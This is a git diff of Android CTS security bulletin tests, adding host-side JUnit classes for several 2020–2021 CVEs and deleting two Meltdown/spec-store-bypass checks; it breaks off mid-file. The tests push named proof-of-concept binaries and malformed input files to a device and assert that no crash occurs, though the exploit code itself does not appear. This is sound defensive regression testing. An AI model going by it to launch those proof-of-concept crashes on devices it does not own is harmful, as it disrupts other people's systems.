index 0000000..e624134
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0037.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0037 extends SecurityTestCase {
+
+ /**
+ * b/143106535
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0037() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0037", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
new file mode 100644
index 0000000..5731c12
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0038.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0038 extends SecurityTestCase {
+
+ /**
+ * b/143109193
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0038() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0038", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
new file mode 100644
index 0000000..7d5ae37
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0039.java
@@ -0,0 +1,39 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0039 extends SecurityTestCase {
+
+ /**
+ * b/143155861
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-03")
+ @Test
+ public void testPocCVE_2020_0039() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0039", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
new file mode 100644
index 0000000..79826e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0073.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.compatibility.common.util.CrashUtils;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0073 extends SecurityTestCase {
+
+ /**
+ * b/147309942
+ * Vulnerability Behaviour: SIGABRT in self
+ */
+ @SecurityTest(minPatchLevel = "2020-04")
+ @Test
+ public void testPocCVE_2020_0073() throws Exception {
+ AdbUtils.assumeHasNfc(getDevice());
+ pocPusher.only64();
+ String binaryName = "CVE-2020-0073";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
new file mode 100644
index 0000000..b02eeea
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0224.java
@@ -0,0 +1,48 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import java.util.Arrays;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0224 extends SecurityTestCase {
+
+ /**
+ * b/147664838
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-07")
+ @Test
+ public void testPocCVE_2020_0224() throws Exception {
+ String inputFiles[] = {"cve_2020_0224.pac"};
+ String binaryName = "CVE-2020-0224";
+ String signals[] = {CrashUtils.SIGSEGV, CrashUtils.SIGBUS, CrashUtils.SIGABRT};
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig(binaryName, getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns(binaryName);
+ testConfig.config.setSignals(signals);
+ testConfig.config.checkMinAddress(false);
+ testConfig.arguments = AdbUtils.TMP_PATH + inputFiles[0];
+ testConfig.inputFiles = Arrays.asList(inputFiles);
+ testConfig.inputFilesDestination = AdbUtils.TMP_PATH;
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
new file mode 100644
index 0000000..4c2b91d
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0243.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import com.android.compatibility.common.util.CrashUtils;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0243 extends SecurityTestCase {
+
+ /**
+ * b/151644303
+ * Vulnerability Behaviour: SIGSEGV in mediaserver
+ */
+ @SecurityTest(minPatchLevel = "2020-08")
+ @Test
+ public void testPocCVE_2020_0243() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2020-0243", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("mediaserver");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
new file mode 100644
index 0000000..2d5237a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0381.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0381 extends SecurityTestCase {
+
+ /**
+ * b/150159669
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0381() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0381.xmf", "cve_2020_0381.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0381",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
new file mode 100644
index 0000000..2e1ca03
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0383.java
@@ -0,0 +1,42 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import static org.junit.Assume.assumeFalse;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0383 extends SecurityTestCase {
+
+ /**
+ * b/150160279
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0383() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0383.xmf", "cve_2020_0383.info"};
+ String binaryName = "CVE-2020-0383";
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(binaryName,
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
new file mode 100644
index 0000000..2f7b5d9
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0384.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0384 extends SecurityTestCase {
+
+ /**
+ * b/150159906
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0384() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0384.xmf", "cve_2020_0384.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0384",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
new file mode 100644
index 0000000..e7aefeb
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0385.java
@@ -0,0 +1,43 @@
+/**
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+import static org.junit.Assume.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2020_0385 extends SecurityTestCase {
+
+ /**
+ * b/150160041
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2020-09")
+ @Test
+ public void testPocCVE_2020_0385() throws Exception {
+ assumeFalse(moduleIsPlayManaged("com.google.android.media"));
+ String inputFiles[] = {"cve_2020_0385.xmf", "cve_2020_0385.info"};
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2020-0385",
+ AdbUtils.TMP_PATH + inputFiles[0] + " " + AdbUtils.TMP_PATH + inputFiles[1],
+ inputFiles, AdbUtils.TMP_PATH, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java
deleted file mode 100644
index 81100e6..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0461.java
+++ /dev/null
@@ -1,46 +0,0 @@
-/**
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
-import static org.junit.Assume.assumeTrue;
-import static org.junit.Assume.assumeThat;
-import static org.hamcrest.CoreMatchers.equalTo;
-import static org.junit.Assert.*;
-
-@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0461 extends SecurityTestCase {
-
- /**
- * b/162741784
- */
- @Test
- @SecurityTest(minPatchLevel = "2020-12")
- public void testPocCVE_2020_0461() throws Exception {
- assumeTrue(containsDriver(getDevice(),
- "/sys/devices/system/cpu/vulnerabilities/meltdown"));
- String meltdown = AdbUtils.runCommandLine(
- "cat /sys/devices/system/cpu/vulnerabilities/meltdown", getDevice());
- assertFalse(meltdown.startsWith("Vulnerable"));
- assertTrue(meltdown.startsWith("Not affected") ||
- meltdown.startsWith("Mitigation"));
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java
deleted file mode 100644
index fe42a0b..0000000
--- a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2020_0462.java
+++ /dev/null
@@ -1,46 +0,0 @@
-/**
- * Copyright (C) 2020 The Android Open Source Project
- *
- * Licensed under the Apache License, Version 2.0 (the "License");
- * you may not use this file except in compliance with the License.
- * You may obtain a copy of the License at
- *
- * http://www.apache.org/licenses/LICENSE-2.0
- *
- * Unless required by applicable law or agreed to in writing, software
- * distributed under the License is distributed on an "AS IS" BASIS,
- * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- * See the License for the specific language governing permissions and
- * limitations under the License.
- */
-
-package android.security.cts;
-
-import android.platform.test.annotations.SecurityTest;
-
-import org.junit.Test;
-import org.junit.runner.RunWith;
-
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-
-import static org.junit.Assume.assumeTrue;
-import static org.junit.Assert.*;
-
-@RunWith(DeviceJUnit4ClassRunner.class)
-public class CVE_2020_0462 extends SecurityTestCase {
-
- /**
- * b/169161709
- */
- @Test
- @SecurityTest(minPatchLevel = "2020-12")
- public void testPocCVE_2020_0462() throws Exception {
- assumeTrue(containsDriver(getDevice(),
- "/sys/devices/system/cpu/vulnerabilities/spec_store_bypass"));
- String spec_store_bypass = AdbUtils.runCommandLine(
- "cat /sys/devices/system/cpu/vulnerabilities/spec_store_bypass", getDevice());
- assertFalse(spec_store_bypass.startsWith("Vulnerable"));
- assertTrue(spec_store_bypass.startsWith("Not affected") ||
- spec_store_bypass.startsWith("Mitigation"));
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
new file mode 100644
index 0000000..dd2aff8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0305.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeInstant;
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.SecurityTest;
+
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+/**
+ * Test that collects test results from test package android.security.cts.CVE_2021_0305.
+ *
+ * When this test builds, it also builds a support APK containing
+ * {@link android.sample.cts.CVE_2021_0305.SampleDeviceTest}, the results of which are
+ * collected from the hostside and reported accordingly.
+ */
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0305 extends BaseHostJUnit4Test {
+ private static final String TEST_PKG = "android.security.cts.CVE_2021_0305";
+ private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+ private static final String TEST_APP = "CVE-2021-0305.apk";
+
+ @Before
+ public void setUp() throws Exception {
+ uninstallPackage(getDevice(), TEST_PKG);
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2020-09")
+ @AppModeFull
+ public void testRunDeviceTestsPassesFull() throws Exception {
+ installPackage();
+ Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "testClick"));
+ }
+
+ private void installPackage() throws Exception {
+ installPackage(TEST_APP, new String[0]);
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
new file mode 100644
index 0000000..3d3f4a8
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0330.java
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.compatibility.common.util.CrashUtils;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0330 extends SecurityTestCase {
+
+ /**
+ * b/170732441
+ * Vulnerability Behaviour: SIGSEGV in storaged
+ */
+ @SecurityTest(minPatchLevel = "2021-02")
+ @Test
+ public void testPocCVE_2021_0330() throws Exception {
+ AdbUtils.pocConfig testConfig = new AdbUtils.pocConfig("CVE-2021-0330", getDevice());
+ testConfig.config = new CrashUtils.Config().setProcessPatterns("storaged");
+ testConfig.config.checkMinAddress(false);
+ AdbUtils.runPocAssertNoCrashesNotVulnerable(testConfig);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
new file mode 100644
index 0000000..2160aca
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0393.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.device.ITestDevice;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0393 extends SecurityTestCase {
+
+ /**
+ * b/168041375
+ * Vulnerability Behavior: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0393() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runProxyAutoConfig("cve_2021_0393", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
new file mode 100644
index 0000000..3df46a7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0396.java
@@ -0,0 +1,38 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.assertTrue;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0396 extends SecurityTestCase {
+
+ /**
+ * b/160610106
+ * Vulnerability Behaviour: SIGSEGV in pacrunner
+ */
+ @SecurityTest(minPatchLevel = "2021-03")
+ @Test
+ public void testPocCVE_2021_0396() throws Exception {
+ AdbUtils.runProxyAutoConfig("cve_2021_0396", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
new file mode 100644
index 0000000..935b601
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0430.java
@@ -0,0 +1,37 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0430 extends SecurityTestCase {
+
+ /**
+ * b/178725766
+ * Vulnerability Behaviour: SIGSEGV in self
+ */
+ @SecurityTest(minPatchLevel = "2021-04")
+ @Test
+ public void testPocCVE_2021_0430() throws Exception {
+ pocPusher.only64();
+ AdbUtils.runPocAssertNoCrashesNotVulnerable("CVE-2021-0430", null, getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
new file mode 100644
index 0000000..25802a0
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0439.java
@@ -0,0 +1,38 @@
+/**
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
